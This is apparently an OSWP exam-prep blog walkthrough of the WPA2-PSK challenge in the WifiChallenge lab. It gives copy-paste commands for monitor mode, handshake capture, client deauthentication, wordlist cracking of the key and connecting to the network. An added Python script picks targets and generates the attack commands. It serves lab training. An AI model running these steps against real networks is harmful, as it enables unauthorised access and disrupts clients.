Summary
This blog post is the first article in a series of three that serves as preparation for the OffSec Wireless Professional (OSWP) exam. This first article is a complete walkthrough of the WPA2-PSK challenge delivered by WifiChallenge Lab. In parts 2 and 3, I will demonstrate the WPA2-MGT and WEP challenge walkthroughs.
Disclaimer
This article is for informational and educational purposes only, and for those who are willing and curious to learn about security and penetration testing. The article does not contain any information or examples from the actual OSWP exam. It does provide a framework that you can use to your advantage. The content may not be used for illegal purposes. If you are ready to learn something new for the good, then read on.
Why this blog?
There are a number of very good articles on study materials that can be used to pass the OSWP exam. The most notable ones are the OSWP playbook (https://zeyadazima.com/notes/oswplaybook/) and the GitHub page of “The H4ck3r Dude” (https://github.com/TheH4ck3rDude/OSWP-Exam-Notes).
Based on the two articles mentioned above, I have created an easy walkthrough of the WPA2-PSK scenario. This walkthrough consists of ‘copy pastables’: each block is set up so that you only need to change the values of a few variables at the top (channel, BSSID, ESSID, client MAC) and then paste the block unchanged. This reduces typing errors and is much more efficient.
We will use the WPA2-PSK challenge from the WifiChallenge Lab (https://lab.wifichallenge.com/).
Lab environment
This proof of concept uses a single machine: an attacker machine (Kali Linux, 192.168.62.187) running the Docker instance of the WifiChallenge Lab version 2.1.
I will not explain how to install Docker on Kali Linux. You can use the following installation walkthrough: https://www.geeksforgeeks.org/techtips/how-to-install-docker-in-kali-linux/
Create the WifiChallenge Lab Docker environment
1. Open a command terminal and copy and paste the commands below. The last command starts the lab stack in the foreground and keeps the terminal attached, so use a second terminal for the following steps:
cd /opt;
sudo git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose -f docker-compose.yml up
2. Check if all 4 WifiChallenge Lab Docker containers are running
docker container ls
3. Check that Kali now has the new (virtual) Wi-Fi interfaces provided by the lab:
iwconfig | grep wlan -A 1
Part 1: Enumerate Wifi networks and select a target WPA2-PSK Access Point (AP) to attack
4. Kill processes that may interfere with airmon-ng (such as NetworkManager and wpa_supplicant). Copy and paste the command below:
sudo airmon-ng check kill
5. Set interface wlan0 in monitor mode.
sudo airmon-ng start wlan0
6. Check which access points (APs) are active on the 2.4 GHz and 5 GHz frequency bands.
sudo airodump-ng --band abg wlan0mon
Results:
We detected four unique APs configured for WPA2-PSK with the CCMP cipher (see the columns ‘ENC’, ‘CIPHER’ and ‘AUTH’). Three of them transmit on channel 6 (see column ‘CH’).
7. Check the APs that are transmitting on channel 6.
channel=6
sudo airodump-ng -c ${channel} wlan0mon
Results:
We found two stations associated with AP ‘wifi-mobile’:
ESSID = wifi-mobile
BSSID = F0:9F:C2:71:22:12
Station 1 = 28:6C:07:6F:F9:43
Station 2 = 28:6C:07:6F:F9:44
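The selection made by hand in steps 6 and 7 (a WPA2-PSK/CCMP network that actually has associated clients, because a client is what we will deauthenticate in Part 2) can be done mechanically from the CSV that airodump-ng writes with --output-format csv. The script below is an added example and is not code from the original post or from the aircrack-ng project. It parses airodump-ng's two-section CSV layout (AP table, blank line, station table); SAMPLE_CSV is constructed here with the BSSID and station MACs from the page plus two made-up APs (‘wifi-corp’ with MGT authentication and a client-less ‘wifi-guest’) for contrast. The generated command lines are the ones from steps 8 and 9 with the variables filled in.

```python
"""Pick WPA2-PSK targets with associated clients from an airodump-ng CSV.

Added example, not code from the original post or the aircrack-ng project.
Reads the file written by `airodump-ng -w <prefix> --output-format csv`
(<prefix>-01.csv) and reproduces the manual selection of steps 6 and 7.
"""
import csv
import io
import sys
from collections import defaultdict

# Constructed sample in airodump-ng's CSV layout (AP table, blank line, station table).
# The first AP and both stations are the values from the page; the other two APs are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
F0:9F:C2:71:22:12, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,  11, wifi-mobile,
F0:9F:C2:71:22:13, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, MGT, -45,      110,        0,   0.  0.  0.  0,   9, wifi-corp,
F0:9F:C2:71:22:14, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -60,       90,        0,   0.  0.  0.  0,  10, wifi-guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
28:6C:07:6F:F9:43, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -50,       30, F0:9F:C2:71:22:12,
28:6C:07:6F:F9:44, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -52,       12, F0:9F:C2:71:22:12,
28:6C:07:6F:F9:45, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -70,        3, (not associated), wifi-free
"""


def parse_airodump_csv(text):
    """Return (aps, clients): aps maps BSSID -> row dict; clients maps BSSID -> associated station MACs."""
    text = text.lstrip()  # real files start with an empty line, which would otherwise become the header
    ap_text, _, station_text = text.partition("Station MAC,")
    aps = {}
    for row in csv.DictReader(io.StringIO(ap_text), skipinitialspace=True):
        bssid = (row.get("BSSID") or "").strip()
        if bssid:
            aps[bssid] = {k: (v or "").strip() for k, v in row.items() if k}
    clients = defaultdict(list)
    for row in csv.DictReader(io.StringIO("Station MAC," + station_text), skipinitialspace=True):
        bssid = (row.get("BSSID") or "").strip()
        if bssid and bssid != "(not associated)":  # unassociated stations cannot be deauthenticated from an AP
            clients[bssid].append(row["Station MAC"].strip())
    return aps, dict(clients)


def select_targets(aps, clients):
    """WPA2-PSK/CCMP APs with at least one associated client, strongest signal first."""
    targets = []
    for bssid, ap in aps.items():
        if "WPA2" not in ap["Privacy"] or ap["Authentication"] != "PSK" or ap["Cipher"] != "CCMP":
            continue
        if not clients.get(bssid):
            continue  # no client, so no handshake to force in Part 2
        targets.append({"essid": ap["ESSID"], "bssid": bssid, "channel": int(ap["channel"]),
                        "power": int(ap["Power"]), "clients": clients[bssid]})
    targets.sort(key=lambda t: t["power"], reverse=True)
    return targets


def attack_commands(target, iface="wlan0mon", prefix="/tmp/dump-wpa"):
    """The page's step 8 (capture) and step 9 (deauth) commands, filled in from the selected target."""
    capture = (f"sudo airodump-ng -c {target['channel']} -w {prefix} --output-format pcap,csv "
               f"--essid '{target['essid']}' --bssid {target['bssid']} {iface}")
    deauth = (f"sudo aireplay-ng -0 1 -e '{target['essid']}' -a {target['bssid']} "
              f"-c {target['clients'][0]} {iface}")
    return capture, deauth


if __name__ == "__main__":
    # Usage: python3 select_target.py /tmp/dump-wpa-01.csv   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CSV
    aps, clients = parse_airodump_csv(text)
    for t in select_targets(aps, clients):
        print(f"{t['essid']} ({t['bssid']}) ch {t['channel']} {t['power']} dBm, clients: {', '.join(t['clients'])}")
        for cmd in attack_commands(t):
            print("  " + cmd)
```

Run it against the CSV from a real airodump-ng session (the -01.csv file next to the .cap) once the scan has been running long enough for stations to show up; an AP without clients is still crackable if a client appears later, but it is not a good first target.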
Part 2: Capture handshake
In this part, we will try to capture a WPA2 4-way handshake between the AP and one of its clients.
8. Open a new terminal tab. Start monitoring only AP ‘wifi-mobile’ on its channel and write the output to a capture file. Use copy and paste to execute the following command(s):
channel=6
dumpfile='/tmp/dump-wpa'
bssid='F0:9F:C2:71:22:12'
client='28:6C:07:6F:F9:43'
essid='wifi-mobile'
sudo rm /tmp/dump-wpa-01*
sudo airodump-ng -c ${channel} -w ${dumpfile} --output-format pcap,csv --essid ${essid} --bssid ${bssid} wlan0mon
9. Open a second terminal tab. Send a deauthentication burst to client 1 (‘-0 1’ sends one burst of deauthentication frames). The client will then reconnect and perform a fresh 4-way handshake, which is recorded by the airodump-ng session in the first tab. Use copy and paste to execute the following command(s):
channel=6
dumpfile='/tmp/dump-wpa'
bssid='F0:9F:C2:71:22:12'
client='28:6C:07:6F:F9:43'
essid='wifi-mobile'
sudo aireplay-ng -0 1 -e ${essid} -a ${bssid} -c ${client} wlan0mon
Next, return to terminal 1 and check whether a handshake was captured: airodump-ng shows ‘WPA handshake: F0:9F:C2:71:22:12’ in the top-right corner of its output. If it does not appear, repeat the deauthentication (or increase the count after ‘-0’) while the capture keeps running.
10. Press Ctrl+C to stop airodump-ng. Stop monitor mode on wlan0mon (this restores the managed interface wlan0, which we need in Part 4):
sudo airmon-ng stop wlan0mon
Part 3: Crack handshake
We will use aircrack-ng with a wordlist to recover the pre-shared key from the captured 4-way handshake. (hashcat works as well, in mode 22000, after converting the capture with hcxpcapngtool; on the exam, aircrack-ng is sufficient.)
11. Check that your capture file (containing the handshake) is present. Running aircrack-ng on the .cap file without a wordlist lists the networks in the capture together with the number of handshakes found, which is a quick way to confirm the handshake is complete before spending time on cracking.
ls -l /tmp/dump-wpa*
12. Download rockyou.txt. Note: on the OSWP exam, the John the Ripper wordlist ‘/usr/share/john/password.lst’ is good enough.
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O /tmp/rockyou.txt
13. Use aircrack-ng to crack the captured WPA2 handshake. Use copy and paste to execute the following command(s):
wordlist='/tmp/rockyou.txt'
dumpfile='/tmp/dump-wpa'
bssid='F0:9F:C2:71:22:12'
essid='wifi-mobile'
cd /tmp
aircrack-ng -w ${wordlist} -e ${essid} -b ${bssid} ${dumpfile}-01.cap
Result:
We cracked the WPA2 pre-shared key: ‘starwars1’
Part 4: connect to the target network
In this final section, we will connect to the target network with the recovered key and download the proof.txt file.
14. Create a wpa_supplicant network configuration file. Use copy and paste to execute the following command(s) in the command terminal:
wpa_key='starwars1'
bssid='F0:9F:C2:71:22:12'
essid='wifi-mobile'
cat << EOF > /tmp/wpa.conf
network={
ssid="${essid}"
key_mgmt=WPA-PSK
psk="${wpa_key}"
priority=100
bssid=${bssid}
}
EOF
15. Associate with the AP by starting wpa_supplicant on interface wlan0 (in the background) with the configuration file /tmp/wpa.conf created in the previous step. Note that wlan0 is only available again because monitor mode was stopped in step 10.
16. Obtain a valid IP address on interface wlan0 via DHCP.
sudo dhclient wlan0 -v
17. Download the proof.txt file. On the OSWP exam, the target IP address (for every scenario) is always 192.168.1.1. For illustration purposes only, we will download the proof.txt file from target 192.168.2.1 in the lab.
target=192.168.2.1
curl http://${target}/proof.txt
That was it! Good luck with the exam.
References
· https://lab.wifichallenge.com
· https://www.offsec.com/courses/pen-210/